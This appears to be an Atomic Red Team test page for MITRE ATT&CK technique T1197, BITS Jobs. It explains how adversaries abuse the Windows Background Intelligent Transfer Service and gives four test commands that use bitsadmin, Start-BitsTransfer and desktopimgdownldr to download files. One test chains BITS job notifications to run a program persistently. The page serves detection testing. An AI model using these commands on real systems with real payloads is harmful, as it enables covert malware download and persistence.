# T1197 - BITS Jobs ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1197)
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
## Atomic Tests - [Atomic Test #1 - Bitsadmin Download (cmd)](#atomic-test-1---bitsadmin-download-cmd) - [Atomic Test #2 - Bitsadmin Download (PowerShell)](#atomic-test-2---bitsadmin-download-powershell) - [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute) - [Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd)](#atomic-test-4---bits-download-using-desktopimgdownldrexe-cmd)
## Atomic Test #1 - Bitsadmin Download (cmd) This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload **Supported Platforms:** Windows **auto_generated_guid:** 3c73d728-75fb-4180-a12f-6712864d7421 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | %temp%\bitsadmin1_flag.ps1| #### Attack Commands: Run with `command_prompt`! ```cmd bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} ``` #### Cleanup Commands: ```cmd del #{local_file} >nul 2>&1 ```

## Atomic Test #2 - Bitsadmin Download (PowerShell) This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory **Supported Platforms:** Windows **auto_generated_guid:** f63b8bc4-07e5-4112-acba-56f646f3f0bc #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | $env:TEMP\bitsadmin2_flag.ps1| #### Attack Commands: Run with `powershell`! ```powershell Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} ``` #### Cleanup Commands: ```powershell Remove-Item #{local_file} -ErrorAction Ignore ```

## Atomic Test #3 - Persist, Download, & Execute This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. **Supported Platforms:** Windows **auto_generated_guid:** 62a06ec5-5754-47d2-bcfc-123d8314c6ae #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe| | bits_job_name | Name of BITS job | string | AtomicBITS| | local_file | Local file path to save downloaded file | path | %temp%\bitsadmin3_flag.ps1| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| #### Attack Commands: Run with `command_prompt`! ```cmd bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} ping -n 5 127.0.0.1 >nul 2>&1 bitsadmin.exe /complete #{bits_job_name} ``` #### Cleanup Commands: ```cmd del #{local_file} >nul 2>&1 ```

## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ **Supported Platforms:** Windows **auto_generated_guid:** afb5e09e-e385-4dee-9a94-6ee60979d114 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:\Windows\Temp| | cleanup_path | path to delete file as part of cleanup_command | path | C:\Windows\Temp\Personalization\LockScreenImage| | cleanup_file | file to remove as part of cleanup_command | string | *.md| #### Attack Commands: Run with `command_prompt`! ```cmd set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr ``` #### Cleanup Commands: ```cmd del #{cleanup_path}\#{cleanup_file} >nul 2>&1 ```